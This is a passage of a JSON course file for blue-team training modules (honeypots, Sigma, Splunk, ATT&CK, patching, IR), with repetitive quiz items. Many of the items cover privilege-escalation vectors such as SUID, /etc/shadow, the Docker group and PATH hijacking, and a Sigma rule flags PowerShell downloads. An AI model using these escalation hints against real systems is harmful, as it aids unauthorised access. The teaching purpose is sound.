all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"honeypot","cat":"Defense & Blue Team","title":"Honeypot Deployment","diff":2,"xp":150,"intro":"Decoy systems.","sections":[{"type":"text","content":"Decoy systems."},{"type":"code","lang":"bash","content":"git clone https://github.com/cowrie/cowrie\n./bin/cowrie start"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Honeypot is?","opts":["Firewall","Decoy system to detect attackers","VPN","IDS"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"sigma-rules","cat":"Defense & Blue Team","title":"Sigma Rules","diff":2,"xp":150,"intro":"Vendor-agnostic detection.","sections":[{"type":"text","content":"Vendor-agnostic detection."},{"type":"code","lang":"bash","content":"title: Suspicious PS Download\ndetection:\n  selection:\n    ScriptBlockText|contains: 'Invoke-WebRequest'"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Sigma special?","opts":["Speed","Vendor-agnostic","Encrypted","Binary"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"deception","cat":"Defense & Blue Team","title":"Deception Technology","diff":2,"xp":150,"intro":"Breadcrumbs and canary tokens.","sections":[{"type":"text","content":"Breadcrumbs and canary tokens."},{"type":"code","lang":"bash","content":"# canarytokens.org\n# Fake admin accounts\n# Canary documents"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Canary token?","opts":["Password","Trap that alerts on access","FW rule","Encryption key"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"splunk","cat":"Defense & Blue Team","title":"Splunk Queries","diff":2,"xp":150,"intro":"SPL for threat detection.","sections":[{"type":"text","content":"SPL for threat detection."},{"type":"code","lang":"bash","content":"index=security \"Failed password\"\n| stats count by src_ip\n| where count > 10"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Splunk query language?","opts":["SQL","SPL","KQL","Lucene"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"mitre","cat":"Defense & Blue Team","title":"MITRE ATT&CK","diff":1,"xp":100,"intro":"Adversary TTP framework.","sections":[{"type":"text","content":"Adversary TTP framework."},{"type":"code","lang":"bash","content":"# Tactics (WHY): Initial Access, Execution...\n# Techniques (HOW): Phishing, PowerShell..."},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"ATT&CK organizes?","opts":["Vulns","Adversary tactics and techniques","Compliance","Patches"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"net-seg","cat":"Defense & Blue Team","title":"Network Segmentation","diff":1,"xp":75,"intro":"Isolate network segments.","sections":[{"type":"text","content":"Isolate network segments."},{"type":"code","lang":"bash","content":"# VLANs, DMZ, separate IoT/servers/workstations"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Segmentation benefit?","opts":["Speed","Limits lateral movement","Cost savings","Simplicity"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"patch-mgmt","cat":"Defense & Blue Team","title":"Patch Management","diff":1,"xp":75,"intro":"Systematic patching.","sections":[{"type":"text","content":"Systematic patching."},{"type":"code","lang":"bash","content":"sudo apt update && sudo apt upgrade -y"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Critical CVSS score?","opts":["5.0","9.0-10.0","7.0","3.0"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"ir-playbook","cat":"Defense & Blue Team","title":"IR Playbooks","diff":2,"xp":125,"intro":"Pre-written response procedures.","sections":[{"type":"text","content":"Pre-written response procedures."},{"type":"code","lang":"bash","content":"# Ransomware: 1.Isolate 2.Identify 3.Backups 4.Preserve 5.Eradicate"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"First ransomware action?","opts":["Pay","Isolate from network","Restore","Call police"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands 